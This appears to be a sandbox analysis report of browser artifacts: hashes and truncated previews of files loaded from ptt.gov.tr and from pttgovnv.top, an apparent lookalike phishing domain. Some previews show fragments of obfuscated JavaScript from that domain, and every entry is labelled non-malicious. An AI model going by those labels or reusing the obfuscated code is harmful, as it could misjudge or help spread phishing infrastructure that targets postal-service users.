          Preview:var acjsFullsize = false;var MOBILE_SCREEN,focus_interval=0,acjs_near_left=!1;function AloChatDraw(t){var e,a,o;AloChat.alochat_page_title=document.title,AloChat.muteChat=!1,0<document.getElementsByClassName("alotech-chat-widget").length?console.log("chat widget already exists"):(e=document.createElement("div"),a=document.createElement("div"),AloChat.fullsize?(e.style.margin="0px",e.style.zIndex="9999999",e.style.backgroundColor="white",t.custom_properties&&t.custom_properties.master_page&&(".alotech-chat-widget"in(masterPageCss=t.custom_properties.master_page)&&masterPageCss[".alotech-chat-widget"].fullsize_status&&masterPageCss[".alotech-chat-widget"].fullsize_status.height&&(e.style.height=masterPageCss[".alotech-chat-widget"].fullsize_status.height),".alotech-chat-body"in masterPageCss)&&masterPageCss[".alotech-chat-body"].fullsize_status&&masterPageCss[".alotech-chat-body"].fullsize_status.height&&(a.style.height=masterPageCss[".alotech-chat-body"].fullsize_status.height)):(e.styl
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (6251)
          Category:dropped
          Size (bytes):6299
          Entropy (8bit):5.275804119350307
          Encrypted:false
          SSDEEP:96:wlBVCnW9nYKvjmGsxWmRxybPlH+xPVVBqmhq50xBmfxPDjRLQ2jc6:wdCnWSKv3MjGcxfB+UIBZl
          MD5:22F20AFA6247DF798587ABA70C5F7BFB
          SHA1:CA40F0F78FFF921142925C410027675DE1F0D967
          SHA-256:762A67F772461C6E06220D94D1D196D858D74F6C1A9F27C4186361CFA0BC951F
          SHA-512:E5FA88D00AD4736E931BB6CC6286F750EB263A5888F322DC52FB3A7200B90162991F15F1CD75DDB2B542113BA84FF0E0FF85D220724750FA3CE7100B5374E921
          Malicious:false
          Reputation:low
          Preview:.style_menuPanel__EhQlL{padding-left:1rem;background-color:#f8f8f8}.style_menu__geUjE{border-left:#00a6cc;background-color:#f8f8f8;position:sticky;overflow:scroll;top:0;max-height:100vh;padding:1.5rem .5rem 2rem 2rem}.style_menu__geUjE::-webkit-scrollbar{width:1rem;scroll-padding-top:20px}.style_menu__geUjE::-webkit-scrollbar-thumb{background:#e3e3e3;border-radius:100px;border:.25rem solid transparent;background-clip:content-box}.style_menu__geUjE>li{position:relative;width:95%;margin:.3rem 0 .3rem .3rem;cursor:pointer;color:var(--pttLinkColor);font-size:1rem}.style_menu__geUjE>li:after{content:"";position:absolute;left:-25px;top:0;width:20px;height:20px}.style_menu__geUjE>li i{position:absolute;top:.4rem;left:-1.4rem}.style_menu__geUjE>li>li i{position:absolute;top:.7rem;left:-1.8rem}.style_menu__geUjE>li>a>b{position:absolute;left:95%}.style_menu__geUjE>li>a{display:flex;align-items:center;padding:0 0 .5rem;width:100%;color:var(--pttLinkColor);font-size:1rem}.style_menu__geUjE>li>a:h
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (56890)
          Category:downloaded
          Size (bytes):56940
          Entropy (8bit):5.647778850919549
          Encrypted:false
          SSDEEP:768:P+jYxCLAGCGYW/PpFbRJYRC8RNKlQMc8s/VhTP4TqCE55N0kz35AJWgN:P+jLACLn3/IRNX9VPp3MWgN
          MD5:B7A046C7B867F6E1F65FF7F0D87C8F46
          SHA1:295730746B4CE11B43690A8ECA26475E159507A0
          SHA-256:4867273879CF0C570E685E2461EB392965A77BF2CB57B9EA56F1F6B42BD6C8EF
          SHA-512:BCF750B30FABE7B1A4A14114FE46818AB43A84585CC705C6C1AB535DFD8C1B7CA0F28DF794CC2A54632EC405A37BA0C7659D15A7BBECCDC4F1850032ABF37BC2
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/4110-3d9f5b5d3b9b653a.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4110],{1295:function(e,n){"use strict";n.Z={src:"/_next/static/media/no-image.77f0b5fb.jpg",height:300,width:500,blurDataURL:"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAoKCgoKCgsMDAsPEA4QDxYUExMUFiIYGhgaGCIzICUgICUgMy03LCksNy1RQDg4QFFeT0pPXnFlZXGPiI+7u/sBCgoKCgoKCwwMCw8QDhAPFhQTExQWIhgaGBoYIjMgJSAgJSAzLTcsKSw3LVFAODhAUV5PSk9ecWVlcY+Ij7u7+//CABEIAAUACAMBIgACEQEDEQH/xAAoAAEBAAAAAAAAAAAAAAAAAAAABwEBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAALAI/8QAGxAAAgEFAAAAAAAAAAAAAAAAAQIAAxETITH/2gAIAQEAAT8AFN1a2Z230z//xAAVEQEBAAAAAAAAAAAAAAAAAAAAEf/aAAgBAgEBPwCP/8QAFREBAQAAAAAAAAAAAAAAAAAAABH/2gAIAQMBAT8Ar//Z"}},8196:function(e,n,t){"use strict";t.d(n,{Z:function(){return O}});var s=t(8565),r=t.n(s),a=t(3288),i=t(2466),l=t(3395),c=t(2260),o=t.n(c),u=t(8082),d=t(2718),h=t(3230),f=t(9792),p=t(1011),_=t(8810),y=t(6731),m=t.n(y);function v(e,n){(null==n||n>e.length)&&(n=e.length);for(var t=0,s=new Array(n);t<n;t++)s[t]=e[t];return s}fun
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text
          Category:downloaded
          Size (bytes):749
          Entropy (8bit):5.044929142480738
          Encrypted:false
          SSDEEP:12:fpcfHOdEK+lXcyPDExMiv2rUX60XlmxNWmK+lXk2yKq+srXmiv2vs2AjRvrcOKGz:BcfeEtl1gCiv2rUK01mnWmtl0iFsrXmO
          MD5:60806A64BBF5D5012498FDF58B1C7728
          SHA1:CF7E20767D84FBFB2BB93ED15FA1FE8C9CFE7F66
          SHA-256:B836AA0FB7B9DF77B5C3CE355379FBEFC6E7DB2DB4FBA49646E3ECDA73885909
          SHA-512:E20B28C39C0B698B848BD467C140BEBB435A62AFEEE715EAAA795087F3CF2DC2F016B3F8804468774F5F26AB2282B08CE12D2C412AFEAB0B610D31298BF34FB0
          Malicious:false
          Reputation:low
          URL:https://pttem.alo-tech.com/chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t
          Preview:#legal_text {..height: 360px;..overflow: auto;.}..speech {..background:#fafeff;.}..speech:before {..border-right: 7px solid #fafeff;.}..speech {..color:#00a7cf;.}..speech .media-heading {..color:#00a7cf;.}..btnCustom {..color:#00a7cf;..border-color:#00a7cf;.}..btnCustom:hover {..color:#00a7cf;..border-color:#00a7cf;..background:transparent;..opacity:0.8;.}..speech-right > .speech {..background:#77C3E3;.}..speech-right > .speech:before {..border-left: 7px solid #77C3E3;.}..speech-right .speech {..color:#ffffff;.}..speech-right > .speech .media-heading {..color:#ffffff;.}.#btnSendMessage {..background-color:#00a7cf;.}.#alo-chat-logout {..background-color:#ea2f1a;.}.#roombody, h3, .chatbody {..font-family:'Open Sans' !important ;.}.// Cached
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
          Category:dropped
          Size (bytes):112550
          Entropy (8bit):5.311884237132668
          Encrypted:false
          SSDEEP:3072:P/OLp3mvR71BPJJipknKTfLswZA4u1ZHA0Yr+4UuKcOHUPHbbcAnK:P/OLNmvR71BPJJip1TfYwZA4u1ZHA0EA
          MD5:9D404836256B5CCA87EC2DD4E6C5B851
          SHA1:2E8C690AD11ADC6A062B6275508D9DE3DE50E96F
          SHA-256:0A692D8595918A8DE18443C98340B61F39B25C3F66C53C28BED94FF18B7E6EC0
          SHA-512:BB9E2EAA4C4FCC6274E0BB0EBC76318EDB828184C0172C98B1DEB049D6E8862F28DD26B4AFAA4ADAF4C7C4D0CFBC7FA1D610C2ACBD3D598F3025ACF91B775D13
          Malicious:false
          Reputation:low
          Preview:const a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x4ad14f(0x291))/0x4)+parseInt(_0x4ad14f(0x150))/0x5+parseInt(_0x4ad14f(0x2d1))/0x6+-parseInt(_0x4ad14f(0x2a6))/0x7+-parseInt(_0x4ad14f(0x13a))/0x8+parseInt(_0x4ad14f(0x1d0))/0x9;if(_0x23aed6===_0x4bd1ef)break;else _0x4f09df['push'](_0x4f09df['shift']());}catch(_0x753273){_0x4f09df['push'](_0x4f09df['shift']());}}}(a1_0x1319,0x6eb50));const a1_0x243f17=(function(){let _0x2d03c3=!![];return function(_0x7dff9c,_0x52e3c8){const _0x3d297c=_0x2d03c3?function(){const _0x153071=a1_0x1a33;if(_0x52e3c8){const _0x33276f=_0x52e3c8[_0x153071(0x36d)](_0x7dff9c,arguments);return _0x52e3c8=null,_0x33276f;}}:function(){};return _0x2d03c3=![],_0x3d297c;};}()),a1_0x454d09=a1_0x243f17(this,function(){const _0x52e53d=a1_0x1a33;return a1_0x454d09[_0x52e53d(0x1c2)]
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):12814
          Entropy (8bit):7.837700315737001
          Encrypted:false
          SSDEEP:192:8Kx9O7t/pK3/1itZQNeNuSkxTASsDcsDgivX58+XSqsho8M256x2H:8qO7t/pKP1iXQNFSkyDFk8X58azsn+6
          MD5:6B7AF6A2B7BD0D796AD01641D6EC5B09
          SHA1:A3CA47AF0E4F628E3093FE6B8DBA29C141075D2C
          SHA-256:E21FDDE02EC42C12B46323A47FAAAE176F1F4BCD33BB72CFCD5F54AF303369F1
          SHA-512:A559D77D27B8EA66686893DFA42DE749B666C23E4CF19CEB0C1D91D19232906E31D2A2B0B070CECF84F02F8A83A40074DD7793AA118E33A2F63B1A590AB9DCF8
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..1.IDATx...Mv.F.7`.=wn.....).L.....W`e..W.y.....^..IOC. .......[.6.H">.$(>.9l.-.....CU...........)...!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@.....99*_...4.@.cO<.....(_.2.M....a}...W.p....A.E..R...k...O....j\...>J.r....m.....*..m..e.D....:.....2....b.Nk..|.e..q...F..<..Mq.B7..e.[).'..".|..b^.}p......(..'-...\.Y.......[?..5......rqu.....I!/*..LWe.su...n\...g.}U..R...l.-.\.>Z...?.v..w.rM.. ..t.\..K.u..~..h.z.......E.0W..c.2u]..5.a..>.Xn.>.0 .. 7+.u.<..ec.KvP!.)...J.sv_fh.=..}.,...P........i..E.....I
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:RIFF (little-endian) data, Web/P image
          Category:downloaded
          Size (bytes):42406
          Entropy (8bit):7.97968488859527
          Encrypted:false
          SSDEEP:768:1oorXSxmPWLkL/IYHs6jipHKCwcT/ZtGJ2AlAGhF22x35kt+YDQpA2ooObEgH4S:1owXS/LkUSLj2Zwc+J2CpLxJruEgH/
          MD5:0B94ED4D25A30530E566195F0F3ADE8B
          SHA1:BF9184B5FCE613FF573CB63DAB6D52520663D8A2
          SHA-256:C35D251C45608F6A64A6EF58590A36C580AD0BC1B0AC53697F2B9398FD64D626
          SHA-512:33E3CC1D4D25628253C632313981E568C75CB65E70B391DF0E86463CF0DC9A6490D18384CDEDF61304D2623A1CC485A5621B814DAD83A7A7EE0590D14BD98EF5
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fyuzyil.ed9dd94c.png&w=1080&q=75
          Preview:RIFF....WEBPVP8X..............ALPH.}....'$H..xkD..9..aR...?..1..>R7@.'...XH5.(c.?..g)...>...8(....[..[..Q..K;....e.hf...ZIja....n.fVfj..w .\..D....y>.y.s.........o.=W.m.:i"". *..b....K.x.[.Ql..c.`.wcM4...F..k..&........s.qN%......#..........N....7...Z.7..m1.Q#.,C.Y.?.+.R.pPN@A....q..j.....U.`.a.-*.8..G%<2....N.5........j.Q5....~..G........7..>..w..a.|../..WwC...).lU6X........5?.2.Zh...u5....4....1.:h.-o.W.....p..P.....;..c...@..[T...y.{..o.6....\..g...\.....}.5_M....(...a....Y....n.......C..pJ...........3.\.G..j..'..x.T.h.1@........(.9...a.j....Q...X....|>....@.......0W_.AZ..$..X/....1.....N....{....\@y....].Ey..f.'.........o5.p.%.....*...i..@9-.\bn..RU.....Q..f56...y._.vC..7..Z......6.'.....f..G.TW....%t.p..3.~0.....%<v...}..t'.0.I..x...h....1..*.LV}`..}. ..:.'........0PQG..j:@W-.se.B..4..U3..U.......S...I...j..#.........4.B.)....u1\S~.=.....|vT2...Yz..#6!.PK..\O+.LS...........1Q..%...Ry`....j..rZ...N.T.>..WQ>......h.....@...x..jk&PZ.r..4....2...
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (16738)
          Category:dropped
          Size (bytes):16786
          Entropy (8bit):5.215177146054649
          Encrypted:false
          SSDEEP:96:rilmZioo339G50Fz+TFRTNGlIUZHW8+IBMSVWT6TIMr8XELtiKIGokAnKmK2/uiR:rigZip3M+cpN812cbrrfLYttyOuiR
          MD5:A1387532464E933F53082E2AAC823BCF
          SHA1:5906C6934848C0BECAA214824C8B1B4DA504E678
          SHA-256:3F0D5462B87C6523CC8435DB1964225DEB7D7FEF4C9D228E290F9C3350947392
          SHA-512:52784644D8FCEEE9748D22819D0F3FCE35B414342CDA43C4127F0DAB087BABD5DED63E63FD07AAF0EAE37BE9A4CBF23AC5A6EA48E43C71E14AB29767ED3A3577
          Malicious:false
          Reputation:low
          Preview:.styles_container__SM2uK{display:flex;display:-ms-flexbox;justify-content:center;align-items:center;flex-direction:column}.styles_container__SM2uK>.styles_title__wSg3c{position:relative;display:inline-block;margin-bottom:4rem;color:var(--pttLinkColor);font-size:1.5rem;font-weight:var(--fontWeight)}.styles_container__SM2uK>.styles_title__wSg3c:before{position:absolute;top:50%;transform:translateY(-50%);left:-1rem;background-color:var(--pttGreenColor);content:"";width:.4rem;height:2rem}.styles_container__SM2uK>.styles_description__ZeTyg{margin-bottom:6rem;color:var(--pttLinkColor);font-weight:var(--fontWeight)}.styles_container__SM2uK>.styles_iconContainer__doMvh{position:relative;padding:1rem}.styles_container__SM2uK>.styles_iconContainer__doMvh>.styles_face__Yx2m0{position:relative;padding:2rem;border-radius:50%;color:var(--pttYellowColor);font-size:8rem;z-index:1}.styles_container__SM2uK>.styles_iconContainer__doMvh>i:not(.styles_face__Yx2m0){color:#eee;font-size:2.5rem}.styles_contai
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:downloaded
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liUF7&sid=n5SI5ZA_n-p0FL9TBQUd
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (4086)
          Category:dropped
          Size (bytes):4139
          Entropy (8bit):5.393553910974737
          Encrypted:false
          SSDEEP:96:MxxRw7sQE5qZ1WjOaIa2/m6AVt1VPS36HubUzo9u:6xr5UeEFAB+TUzuu
          MD5:DFEE98010DCF2B223E0680CAD37056CC
          SHA1:A63C810D8E0A3D9D200D2DFADC1FED0A63691B20
          SHA-256:702355D4CC2083DAADFED72A685F55402783DB80AAA2971C41258A550551E989
          SHA-512:C697CAE9D33FD36D901731FED8204656895FFAC8D3F77B02003F585913053121CA5DD28F0223D99DD6465BF9AE80B3F82F2C43F0FEA08E286A0F3326C72D1E14
          Malicious:false
          Reputation:low
          Preview:!function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r].call(u.exports,u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u){if(!r){var i=1/0;for(d=0;d<e.length;d++){r=e[d][0],o=e[d][1],u=e[d][2];for(var f=!0,c=0;c<r.length;c++)(!1&u||i>=u)&&Object.keys(n.O).every((function(e){return n.O[e](r[c])}))?r.splice(c--,1):(f=!1,u<i&&(i=u));if(f){e.splice(d--,1);var a=o();void 0!==a&&(t=a)}}return t}u=u||0;for(var d=e.length;d>0&&e[d-1][2]>u;d--)e[d]=e[d-1];e[d]=[r,o,u]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(r,o){if(1&o&&(r=this(r)),8&o)return r;if("object"===typeof r&&r){if(4&o&&r.__esModule)return r;if(16&o&&"function"===typeof r.then)return r}var u=Object.cre
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text, with very long lines (435)
          Category:downloaded
          Size (bytes):1638
          Entropy (8bit):5.1590572904491
          Encrypted:false
          SSDEEP:48:lp6uGkcrVAGpAL+RdZyFjHyoH/XlukT2F1bziHpciH/oH/w:lERr6DCZydHRH/XluB1niHaiHgH/w
          MD5:00B17816E749FFE05B96561CFA6EC7FE
          SHA1:55CB98153952808CC274D7608D17A36897921BF8
          SHA-256:9A59F865220295BD945A89A98BA32654D6AD01CE00D9F2FA098238C665D8D7BB
          SHA-512:2083C2287146581310A78C4E79FFD9C726B218767D40A64A7CACBE0CF28BBBE2A1ABA173B26F273C995D19F16D1BD3A92759DB97171C7DE5149A37E4EA3F1E9C
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/
          Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <meta. name="viewport". content="width=device-width, initial-scale=1.0, user-scalable=no". />. <script type="module" crossorigin src="./assets/index-f5457718.js"></script>. <link rel="stylesheet" href="./assets/f6170fbbkFGym.css">. <script type="module">import.meta.url;import("_").catch(()=>1);async function* g(){};if(location.protocol!="file:"){window.__vite_is_modern_browser=true}</script>. <script type="module">!function(){if(window.__vite_is_modern_browser)return;console.warn("vite: loading legacy chunks, syntax error above and the same error below should be ignored");var e=document.getElementById("vite-legacy-polyfill"),n=document.createElement("script");n.src=e.src,n.onload=function(){System.import(document.getElementById('vite-legacy-entry').getAttribute('data-src'))},document.body.appendChild(n)}();</script>. </head>. <body>. <div id="app"></div>. . <script nomodule>!function(){
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (1900)
          Category:dropped
          Size (bytes):1948
          Entropy (8bit):5.107228084689267
          Encrypted:false
          SSDEEP:24:SeVQkSvyC5uCWJInOsqd1k+fZXI1KS5RfzxCvjVsVxjhIYy+O5kaxNsj8q:rDb63BrrcLV8NeYnaq
          MD5:11114FC9A1C91EBA1446421ED9DB340F
          SHA1:6F19E1DDB03BCF4716E2ACD7C9D2CF7D43C36753
          SHA-256:639E5AA138803477D8E3E900753D832A79082B1A470C3550E94046E6B4339E33
          SHA-512:AE96ED02EF6EC6C4EE3F340320B8BCF57BA26B839043213126E04D19002B99EEEBA33D0ED28BB96AB503F881473946F5870B1883454E28B78FEF3C15C45909A7
          Malicious:false
          Reputation:low
          Preview:.styles_container__ogyrU{padding:2rem;margin:0 auto;display:flex;overflow:hidden;flex-direction:column;align-items:center}.styles_header__EPk94{display:flex;justify-content:left}.styles_container__ogyrU>.styles_header__EPk94>h1{font-size:1.5rem}.styles_container__ogyrU>div.styles_disclaimer__1RacZ{border-bottom:1px solid rgba(39,2,2,.2);padding:1rem;margin-bottom:2rem;text-align:left;display:flex;justify-content:center}.styles_table__D3nIx{text-align:center;margin:auto;min-width:70%;border-collapse:collapse;border-radius:1rem;overflow:hidden}.styles_table__D3nIx>thead>tr>th{padding:1rem;border-right:4px solid hsla(0,0%,100%,.2);border-top:1px solid var(--pttYellowColor);color:#000;text-align:center;font-size:1rem}.styles_table__D3nIx>thead>tr>th:last-child{border-right:none}.styles_table__D3nIx>thead>tr:first-child{background-color:#ffc72c86;height:40px}.styles_table__D3nIx>thead{border-radius:1rem}.styles_table__D3nIx>tbody{background-color:#f8f8f8}.styles_table__D3nIx>thead>th:first-
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (35443), with no line terminators
          Category:dropped
          Size (bytes):35443
          Entropy (8bit):5.338743939035259
          Encrypted:false
          SSDEEP:768:8qiDiLzUsyD9YgG+UmAn2O1pRv42f9lUA7h2+JzQCjSpaZ/tgaTkU0ZAm/X1qnyw:8qOu42kEjzrpNX
          MD5:BC5635E1DA3D2182E2FDC5D1FAAE7853
          SHA1:40762193C4C05DAFAF5DD5E6DCE57608638FB847
          SHA-256:0563B1A4C7810B2DA5B4D1762D4C3281B62C0B082D4EBB6ACECD2CF88CB9BB14
          SHA-512:69C23223AAEE6A3C83133FA3C63C9A7AC361C8FDF0AF89BADF15A2D9CAFD132C0E0A42A77BD950B4539357F56082F5764897A849B9039C6F58DA7C82D9F6B938
          Malicious:false
          Reputation:low
          Preview:var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e885(0x265))/0x4)+-parseInt(_0x13e885(0x2aa))/0x5+-parseInt(_0x13e885(0x238))/0x6+-parseInt(_0x13e885(0x1cd))/0x7*(-parseInt(_0x13e885(0x263))/0x8)+-parseInt(_0x13e885(0x26f))/0x9+parseInt(_0x13e885(0x250))/0xa*(parseInt(_0x13e885(0x2ea))/0xb);if(_0x4cc568===_0x29dadb)break;else _0x13bea8['push'](_0x13bea8['shift']());}catch(_0x334a50){_0x13bea8['push'](_0x13bea8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var _0x5590cd=a23_0x1b94;return E=Object['setPrototy'+_0x5590cd(0x2d2)]||{'__proto__':[]}instanceof Array&&function(_0x773e98,_0x1801a7){var _0x3
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (6026)
          Category:downloaded
          Size (bytes):6208
          Entropy (8bit):4.93500615973303
          Encrypted:false
          SSDEEP:48:FzvPioGBDRCsjVTvvl7JUhKzFVwscifwtqUBGdrdjJv2zLedka4PAWThn111rTEP:VP6BxEK3fwtwdf2aun11y6tuDtyjtCh
          MD5:5B8237FC123BA2EB989444AF7BCAA46B
          SHA1:5C9F48C258173E23640AF75387C8C2B81932CE00
          SHA-256:F5527879E1C455A0C61FAEE05E586CA38563B69EAB4C2F3CB7C68E94E1089FDA
          SHA-512:E2D9B2BCE2953378F0C4FA868C92AC9634E534074904030D8D8A35B0D7CDE4D1159D1DE916482AE079845A82B395B2A5562FCAB97B89A52803D6CBECCB60ECD1
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/fontawesome/css/all.min.css
          Preview:/*!. * Font Awesome Free 5.12.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-spin{-webkit-animation:fa-spin 2s linear infinite;animation:fa-spin 2s linear infinite}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):214521
          Entropy (8bit):5.8438574337590135
          Encrypted:false
          SSDEEP:3072:6ZOJBndfIwfpZT0dWNiLmhcLaN/xpjejNvT3XdhryvR6+4qTSQLzLvU4yPQM6:64JZtpTGheveqTSQLznyPQM6
          MD5:81B10B18782DFD9590D944465A704404
          SHA1:3CAD5C6F58E8666A879E81B7E6FD592850F44604
          SHA-256:232409D55C1D276190D667D259BF6F51D89D00898ED6484ADBF27EBAC1A37791
          SHA-512:ECE52576AA7134AFC7D2B02F34F710E9F4AB5AA85D6A2DA587F49875436962945875BF50FBE3FEFB45B15421794611054781E084F085BEC111A40E9D0A579F42
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{242:function(e,t,n){var r={"./en/GetLanguageResourceResponse":[6855,6855],"./en/GetLanguageResourceResponse.json":[6855,6855],"./tr/GetLanguageResourceResponse":[6219,3401],"./tr/GetLanguageResourceResponse.json":[6219,3401]};function o(e){if(!n.o(r,e))return Promise.resolve().then((function(){var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}));var t=r[e],o=t[0];return n.e(t[1]).then((function(){return n.t(o,19)}))}o.keys=function(){return Object.keys(r)},o.id=242,e.exports=o},3197:function(e,t){"use strict";t.parse=function(e,t){if("string"!==typeof e)throw new TypeError("argument str must be a string");for(var r={},o=t||{},i=e.split(";"),c=o.decode||n,s=0;s<i.length;s++){var l=i[s],u=l.indexOf("=");if(!(u<0)){var f=l.substring(0,u).trim();if(void 0==r[f]){var d=l.substring(u+1,l.length).trim();'"'===d[0]&&(d=d.slice(1,-1)),r[f]=a(d,c)}}}return r},t.serialize=function(e,t,n){var a=n||{},i=a.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (16738)
          Category:downloaded
          Size (bytes):16786
          Entropy (8bit):5.215177146054649
          Encrypted:false
          SSDEEP:96:rilmZioo339G50Fz+TFRTNGlIUZHW8+IBMSVWT6TIMr8XELtiKIGokAnKmK2/uiR:rigZip3M+cpN812cbrrfLYttyOuiR
          MD5:A1387532464E933F53082E2AAC823BCF
          SHA1:5906C6934848C0BECAA214824C8B1B4DA504E678
          SHA-256:3F0D5462B87C6523CC8435DB1964225DEB7D7FEF4C9D228E290F9C3350947392
          SHA-512:52784644D8FCEEE9748D22819D0F3FCE35B414342CDA43C4127F0DAB087BABD5DED63E63FD07AAF0EAE37BE9A4CBF23AC5A6EA48E43C71E14AB29767ED3A3577
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/css/6243e9b9a276eab5.css
